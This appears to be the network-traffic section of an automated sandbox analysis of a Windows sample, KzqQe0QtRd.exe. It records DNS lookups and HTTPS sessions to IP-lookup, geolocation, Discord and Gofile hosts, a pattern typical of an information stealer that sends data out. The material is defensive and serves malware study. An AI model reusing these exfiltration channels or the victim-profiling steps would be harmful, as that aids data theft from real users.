Sep 8, 2023 07:31:35.662838936 CEST	49720	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:35.666091919 CEST	49720	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:35.666261911 CEST	443	49720	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:35.666548967 CEST	49720	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:35.666563034 CEST	443	49720	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:35.807168007 CEST	49720	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:36.000281096 CEST	443	49720	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:36.000382900 CEST	443	49720	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:36.000430107 CEST	49720	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:36.001651049 CEST	49720	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:36.423608065 CEST	49724	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:36.423671961 CEST	443	49724	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:36.423782110 CEST	49724	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:36.424952030 CEST	49724	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:36.424984932 CEST	443	49724	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:36.757669926 CEST	443	49724	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:36.764158964 CEST	49724	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:36.764202118 CEST	443	49724	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:36.767559052 CEST	443	49724	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:36.767703056 CEST	49724	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:36.769787073 CEST	49724	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:36.769952059 CEST	49724	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:36.770008087 CEST	49724	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:36.770016909 CEST	443	49724	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:36.811492920 CEST	443	49724	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:36.975505114 CEST	443	49724	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:36.975732088 CEST	49724	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:37.255919933 CEST	443	49724	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:37.256158113 CEST	443	49724	162.159.137.232	192.168.2.7
Sep 8, 2023 07:31:37.256278992 CEST	49724	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:37.257250071 CEST	49724	443	192.168.2.7	162.159.137.232
Sep 8, 2023 07:31:37.471580982 CEST	49725	443	192.168.2.7	51.178.66.33
Sep 8, 2023 07:31:37.471636057 CEST	443	49725	51.178.66.33	192.168.2.7
Sep 8, 2023 07:31:37.471750975 CEST	49725	443	192.168.2.7	51.178.66.33
Sep 8, 2023 07:31:37.969717026 CEST	49725	443	192.168.2.7	51.178.66.33
Sep 8, 2023 07:31:37.969779015 CEST	443	49725	51.178.66.33	192.168.2.7
Sep 8, 2023 07:31:38.981033087 CEST	443	49725	51.178.66.33	192.168.2.7
Sep 8, 2023 07:31:38.981616020 CEST	49725	443	192.168.2.7	51.178.66.33
Sep 8, 2023 07:31:38.981659889 CEST	443	49725	51.178.66.33	192.168.2.7
Sep 8, 2023 07:31:38.983011007 CEST	443	49725	51.178.66.33	192.168.2.7
Sep 8, 2023 07:31:38.983129025 CEST	49725	443	192.168.2.7	51.178.66.33
Sep 8, 2023 07:31:38.991888046 CEST	49725	443	192.168.2.7	51.178.66.33
Sep 8, 2023 07:31:38.992104053 CEST	49725	443	192.168.2.7	51.178.66.33
Sep 8, 2023 07:31:39.361880064 CEST	49726	443	192.168.2.7	64.185.227.156
Sep 8, 2023 07:31:39.361965895 CEST	443	49726	64.185.227.156	192.168.2.7
Sep 8, 2023 07:31:39.362066984 CEST	49726	443	192.168.2.7	64.185.227.156
Sep 8, 2023 07:31:39.363636017 CEST	49726	443	192.168.2.7	64.185.227.156
Sep 8, 2023 07:31:39.363672972 CEST	443	49726	64.185.227.156	192.168.2.7
Sep 8, 2023 07:31:40.054210901 CEST	443	49726	64.185.227.156	192.168.2.7
Sep 8, 2023 07:31:40.054867029 CEST	49726	443	192.168.2.7	64.185.227.156
Sep 8, 2023 07:31:40.054917097 CEST	443	49726	64.185.227.156	192.168.2.7
Sep 8, 2023 07:31:40.057223082 CEST	443	49726	64.185.227.156	192.168.2.7
Sep 8, 2023 07:31:40.057480097 CEST	49726	443	192.168.2.7	64.185.227.156
Sep 8, 2023 07:31:40.060182095 CEST	49726	443	192.168.2.7	64.185.227.156
Sep 8, 2023 07:31:40.060362101 CEST	49726	443	192.168.2.7	64.185.227.156
Sep 8, 2023 07:31:40.060451031 CEST	443	49726	64.185.227.156	192.168.2.7
Sep 8, 2023 07:31:40.198194027 CEST	49726	443	192.168.2.7	64.185.227.156
Sep 8, 2023 07:31:40.198276043 CEST	443	49726	64.185.227.156	192.168.2.7
Sep 8, 2023 07:31:40.307497025 CEST	49726	443	192.168.2.7	64.185.227.156
Sep 8, 2023 07:31:40.507030964 CEST	443	49726	64.185.227.156	192.168.2.7
Sep 8, 2023 07:31:40.507189035 CEST	443	49726	64.185.227.156	192.168.2.7
Sep 8, 2023 07:31:40.507280111 CEST	49726	443	192.168.2.7	64.185.227.156
Sep 8, 2023 07:31:40.520936012 CEST	49726	443	192.168.2.7	64.185.227.156
Sep 8, 2023 07:31:40.921957016 CEST	49728	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:40.922029018 CEST	443	49728	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:40.922138929 CEST	49728	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:40.923369884 CEST	49728	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:40.923403025 CEST	443	49728	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:41.884169102 CEST	443	49728	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:41.884984016 CEST	49728	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:41.885021925 CEST	443	49728	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:41.887216091 CEST	443	49728	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:41.887387991 CEST	49728	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:41.892368078 CEST	49728	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:41.892612934 CEST	49728	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:41.892656088 CEST	443	49728	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:42.073365927 CEST	49728	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:42.073410034 CEST	443	49728	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:42.226142883 CEST	443	49728	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:42.226217031 CEST	49728	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:42.227093935 CEST	49728	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:42.605079889 CEST	49735	443	192.168.2.7	162.159.135.232
Sep 8, 2023 07:31:42.605145931 CEST	443	49735	162.159.135.232	192.168.2.7
Sep 8, 2023 07:31:42.605241060 CEST	49735	443	192.168.2.7	162.159.135.232
Sep 8, 2023 07:31:42.607139111 CEST	49735	443	192.168.2.7	162.159.135.232
Sep 8, 2023 07:31:42.607168913 CEST	443	49735	162.159.135.232	192.168.2.7
Sep 8, 2023 07:31:42.937060118 CEST	443	49735	162.159.135.232	192.168.2.7
Sep 8, 2023 07:31:42.937556982 CEST	49735	443	192.168.2.7	162.159.135.232
Sep 8, 2023 07:31:42.937586069 CEST	443	49735	162.159.135.232	192.168.2.7
Sep 8, 2023 07:31:42.938842058 CEST	443	49735	162.159.135.232	192.168.2.7
Sep 8, 2023 07:31:42.938931942 CEST	49735	443	192.168.2.7	162.159.135.232
Sep 8, 2023 07:31:42.940915108 CEST	49735	443	192.168.2.7	162.159.135.232
Sep 8, 2023 07:31:42.941061974 CEST	443	49735	162.159.135.232	192.168.2.7
Sep 8, 2023 07:31:42.941083908 CEST	49735	443	192.168.2.7	162.159.135.232
Sep 8, 2023 07:31:42.941138983 CEST	49735	443	192.168.2.7	162.159.135.232
Sep 8, 2023 07:31:42.941148996 CEST	443	49735	162.159.135.232	192.168.2.7
Sep 8, 2023 07:31:43.011008978 CEST	49735	443	192.168.2.7	162.159.135.232
Sep 8, 2023 07:31:43.443401098 CEST	443	49735	162.159.135.232	192.168.2.7
Sep 8, 2023 07:31:43.443564892 CEST	443	49735	162.159.135.232	192.168.2.7
Sep 8, 2023 07:31:43.443644047 CEST	49735	443	192.168.2.7	162.159.135.232
Sep 8, 2023 07:31:43.444555998 CEST	49735	443	192.168.2.7	162.159.135.232
Sep 8, 2023 07:31:44.008488894 CEST	49737	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:44.008522987 CEST	443	49737	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:44.008594036 CEST	49737	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:44.010288954 CEST	49737	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:44.010305882 CEST	443	49737	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:44.635425091 CEST	443	49737	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:44.640785933 CEST	49737	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:44.640837908 CEST	443	49737	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:44.643368959 CEST	443	49737	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:44.643563986 CEST	49737	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:44.645874023 CEST	49737	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:44.646207094 CEST	49737	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:44.646219969 CEST	443	49737	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:44.691477060 CEST	443	49737	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:44.760637999 CEST	49737	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:44.760663986 CEST	443	49737	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:44.869906902 CEST	49737	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:45.033227921 CEST	443	49737	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:45.033361912 CEST	443	49737	173.231.16.76	192.168.2.7
Sep 8, 2023 07:31:45.033451080 CEST	49737	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:45.034141064 CEST	49737	443	192.168.2.7	173.231.16.76
Sep 8, 2023 07:31:45.387531042 CEST	49738	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:45.387593985 CEST	443	49738	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:45.387676954 CEST	49738	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:45.389355898 CEST	49738	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:45.389393091 CEST	443	49738	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:46.372438908 CEST	443	49738	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:46.373532057 CEST	49738	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:46.373589039 CEST	443	49738	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:46.375046968 CEST	443	49738	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:46.375181913 CEST	49738	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:46.378602982 CEST	49738	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:46.378835917 CEST	49738	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:46.378875971 CEST	443	49738	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:46.573215008 CEST	49738	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:46.573267937 CEST	443	49738	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:46.723366976 CEST	443	49738	159.89.102.253	192.168.2.7
Sep 8, 2023 07:31:46.723572016 CEST	49738	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:46.729980946 CEST	49738	443	192.168.2.7	159.89.102.253
Sep 8, 2023 07:31:47.081656933 CEST	49739	443	192.168.2.7	162.159.136.232
Sep 8, 2023 07:31:47.081729889 CEST	443	49739	162.159.136.232	192.168.2.7
Sep 8, 2023 07:31:47.081828117 CEST	49739	443	192.168.2.7	162.159.136.232
Sep 8, 2023 07:31:47.082834959 CEST	49739	443	192.168.2.7	162.159.136.232
Sep 8, 2023 07:31:47.082861900 CEST	443	49739	162.159.136.232	192.168.2.7
Sep 8, 2023 07:31:47.415707111 CEST	443	49739	162.159.136.232	192.168.2.7
Sep 8, 2023 07:31:47.416203976 CEST	49739	443	192.168.2.7	162.159.136.232
Sep 8, 2023 07:31:47.416229010 CEST	443	49739	162.159.136.232	192.168.2.7
Sep 8, 2023 07:31:47.417695045 CEST	443	49739	162.159.136.232	192.168.2.7
Sep 8, 2023 07:31:47.417841911 CEST	49739	443	192.168.2.7	162.159.136.232
Sep 8, 2023 07:31:47.421291113 CEST	49739	443	192.168.2.7	162.159.136.232
Sep 8, 2023 07:31:47.421516895 CEST	443	49739	162.159.136.232	192.168.2.7
Sep 8, 2023 07:31:47.421554089 CEST	49739	443	192.168.2.7	162.159.136.232
Sep 8, 2023 07:31:47.421638012 CEST	49739	443	192.168.2.7	162.159.136.232
Sep 8, 2023 07:31:47.421658993 CEST	443	49739	162.159.136.232	192.168.2.7
Sep 8, 2023 07:31:47.463797092 CEST	49739	443	192.168.2.7	162.159.136.232
Sep 8, 2023 07:31:47.929728985 CEST	443	49739	162.159.136.232	192.168.2.7
Sep 8, 2023 07:31:47.929883957 CEST	443	49739	162.159.136.232	192.168.2.7
Sep 8, 2023 07:31:47.929963112 CEST	49739	443	192.168.2.7	162.159.136.232
Sep 8, 2023 07:31:47.930764914 CEST	49739	443	192.168.2.7	162.159.136.232

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 8, 2023 07:31:25.197752953 CEST	54871	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:25.198550940 CEST	58820	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:25.397181034 CEST	53	58820	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:25.398648024 CEST	53	54871	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:26.548656940 CEST	58650	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:26.747035027 CEST	53	58650	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:28.211025953 CEST	61827	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:28.413131952 CEST	53	61827	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:31.344490051 CEST	56532	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:31.556756020 CEST	53	56532	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:34.505997896 CEST	54488	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:34.703324080 CEST	53	54488	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:36.174547911 CEST	59378	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:36.386863947 CEST	53	59378	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:37.265516043 CEST	58548	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:37.469054937 CEST	53	58548	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:39.158814907 CEST	56530	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:39.360116005 CEST	53	56530	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:40.668000937 CEST	61087	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:40.915772915 CEST	53	61087	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:42.350007057 CEST	56823	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:42.579523087 CEST	53	56823	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:43.804495096 CEST	53605	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:44.006851912 CEST	53	53605	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:45.176448107 CEST	57658	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:45.385262966 CEST	53	57658	8.8.8.8	192.168.2.7
Sep 8, 2023 07:31:46.865626097 CEST	58139	53	192.168.2.7	8.8.8.8
Sep 8, 2023 07:31:47.077600002 CEST	53	58139	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 8, 2023 07:31:25.197752953 CEST	192.168.2.7	8.8.8.8	0x5d73	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:25.198550940 CEST	192.168.2.7	8.8.8.8	0xefc1	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:26.548656940 CEST	192.168.2.7	8.8.8.8	0x629b	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:28.211025953 CEST	192.168.2.7	8.8.8.8	0x156e	Standard query (0)	ptb.discord.com	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:31.344490051 CEST	192.168.2.7	8.8.8.8	0x6f0	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:34.505997896 CEST	192.168.2.7	8.8.8.8	0xfde4	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:36.174547911 CEST	192.168.2.7	8.8.8.8	0x76b9	Standard query (0)	ptb.discord.com	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:37.265516043 CEST	192.168.2.7	8.8.8.8	0xd4fc	Standard query (0)	api.gofile.io	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:39.158814907 CEST	192.168.2.7	8.8.8.8	0xf4f6	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:40.668000937 CEST	192.168.2.7	8.8.8.8	0x37f7	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:42.350007057 CEST	192.168.2.7	8.8.8.8	0xb6eb	Standard query (0)	ptb.discord.com	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:43.804495096 CEST	192.168.2.7	8.8.8.8	0x8a5b	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:45.176448107 CEST	192.168.2.7	8.8.8.8	0xfe02	Standard query (0)	geolocation-db.com	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:46.865626097 CEST	192.168.2.7	8.8.8.8	0x8a24	Standard query (0)	ptb.discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 8, 2023 07:31:25.397181034 CEST	8.8.8.8	192.168.2.7	0xefc1	No error (0)	api.gofile.io		51.38.43.18	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:25.397181034 CEST	8.8.8.8	192.168.2.7	0xefc1	No error (0)	api.gofile.io		151.80.29.83	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:25.397181034 CEST	8.8.8.8	192.168.2.7	0xefc1	No error (0)	api.gofile.io		51.178.66.33	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:25.398648024 CEST	8.8.8.8	192.168.2.7	0x5d73	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Sep 8, 2023 07:31:25.398648024 CEST	8.8.8.8	192.168.2.7	0x5d73	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:25.398648024 CEST	8.8.8.8	192.168.2.7	0x5d73	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:25.398648024 CEST	8.8.8.8	192.168.2.7	0x5d73	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:26.747035027 CEST	8.8.8.8	192.168.2.7	0x629b	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:28.413131952 CEST	8.8.8.8	192.168.2.7	0x156e	No error (0)	ptb.discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:28.413131952 CEST	8.8.8.8	192.168.2.7	0x156e	No error (0)	ptb.discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:28.413131952 CEST	8.8.8.8	192.168.2.7	0x156e	No error (0)	ptb.discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:28.413131952 CEST	8.8.8.8	192.168.2.7	0x156e	No error (0)	ptb.discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:28.413131952 CEST	8.8.8.8	192.168.2.7	0x156e	No error (0)	ptb.discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:31.556756020 CEST	8.8.8.8	192.168.2.7	0x6f0	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Sep 8, 2023 07:31:31.556756020 CEST	8.8.8.8	192.168.2.7	0x6f0	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:31.556756020 CEST	8.8.8.8	192.168.2.7	0x6f0	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:31.556756020 CEST	8.8.8.8	192.168.2.7	0x6f0	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:34.703324080 CEST	8.8.8.8	192.168.2.7	0xfde4	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:36.386863947 CEST	8.8.8.8	192.168.2.7	0x76b9	No error (0)	ptb.discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:36.386863947 CEST	8.8.8.8	192.168.2.7	0x76b9	No error (0)	ptb.discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:36.386863947 CEST	8.8.8.8	192.168.2.7	0x76b9	No error (0)	ptb.discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:36.386863947 CEST	8.8.8.8	192.168.2.7	0x76b9	No error (0)	ptb.discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:36.386863947 CEST	8.8.8.8	192.168.2.7	0x76b9	No error (0)	ptb.discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:37.469054937 CEST	8.8.8.8	192.168.2.7	0xd4fc	No error (0)	api.gofile.io		51.178.66.33	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:37.469054937 CEST	8.8.8.8	192.168.2.7	0xd4fc	No error (0)	api.gofile.io		151.80.29.83	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:37.469054937 CEST	8.8.8.8	192.168.2.7	0xd4fc	No error (0)	api.gofile.io		51.38.43.18	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:39.360116005 CEST	8.8.8.8	192.168.2.7	0xf4f6	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Sep 8, 2023 07:31:39.360116005 CEST	8.8.8.8	192.168.2.7	0xf4f6	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:39.360116005 CEST	8.8.8.8	192.168.2.7	0xf4f6	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:39.360116005 CEST	8.8.8.8	192.168.2.7	0xf4f6	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:40.915772915 CEST	8.8.8.8	192.168.2.7	0x37f7	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:42.579523087 CEST	8.8.8.8	192.168.2.7	0xb6eb	No error (0)	ptb.discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:42.579523087 CEST	8.8.8.8	192.168.2.7	0xb6eb	No error (0)	ptb.discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:42.579523087 CEST	8.8.8.8	192.168.2.7	0xb6eb	No error (0)	ptb.discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:42.579523087 CEST	8.8.8.8	192.168.2.7	0xb6eb	No error (0)	ptb.discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:42.579523087 CEST	8.8.8.8	192.168.2.7	0xb6eb	No error (0)	ptb.discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:44.006851912 CEST	8.8.8.8	192.168.2.7	0x8a5b	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
Sep 8, 2023 07:31:44.006851912 CEST	8.8.8.8	192.168.2.7	0x8a5b	No error (0)	api4.ipify.org		173.231.16.76	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:44.006851912 CEST	8.8.8.8	192.168.2.7	0x8a5b	No error (0)	api4.ipify.org		104.237.62.212	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:44.006851912 CEST	8.8.8.8	192.168.2.7	0x8a5b	No error (0)	api4.ipify.org		64.185.227.156	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:45.385262966 CEST	8.8.8.8	192.168.2.7	0xfe02	No error (0)	geolocation-db.com		159.89.102.253	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:47.077600002 CEST	8.8.8.8	192.168.2.7	0x8a24	No error (0)	ptb.discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:47.077600002 CEST	8.8.8.8	192.168.2.7	0x8a24	No error (0)	ptb.discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:47.077600002 CEST	8.8.8.8	192.168.2.7	0x8a24	No error (0)	ptb.discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:47.077600002 CEST	8.8.8.8	192.168.2.7	0x8a24	No error (0)	ptb.discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Sep 8, 2023 07:31:47.077600002 CEST	8.8.8.8	192.168.2.7	0x8a24	No error (0)	ptb.discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

geolocation-db.com

ptb.discord.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49715	173.231.16.76	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	Direction	Data
2023-09-08 05:31:26 UTC	OUT	GET / HTTP/1.1 Accept-Encoding: identity Host: api.ipify.org User-Agent: Python-urllib/3.11 Connection: close
2023-09-08 05:31:26 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Fri, 08 Sep 2023 05:31:26 GMT Content-Type: text/plain Content-Length: 13 Connection: close Vary: Origin
2023-09-08 05:31:26 UTC	IN	Data Raw: 31 39 31 2e 31 30 31 2e 36 31 2e 31 39 Data Ascii: 191.101.61.19

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49717	159.89.102.253	443	C:\Users\user\Desktop\KzqQe0QtRd.exe

Timestamp	Direction	Data
2023-09-08 05:31:27 UTC	OUT	GET /jsonp/191.101.61.19 HTTP/1.1 Accept-Encoding: identity Host: geolocation-db.com User-Agent: Python-urllib/3.11 Connection: close
2023-09-08 05:31:28 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.14.0 (Ubuntu) Date: Fri, 08 Sep 2023 05:31:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: *
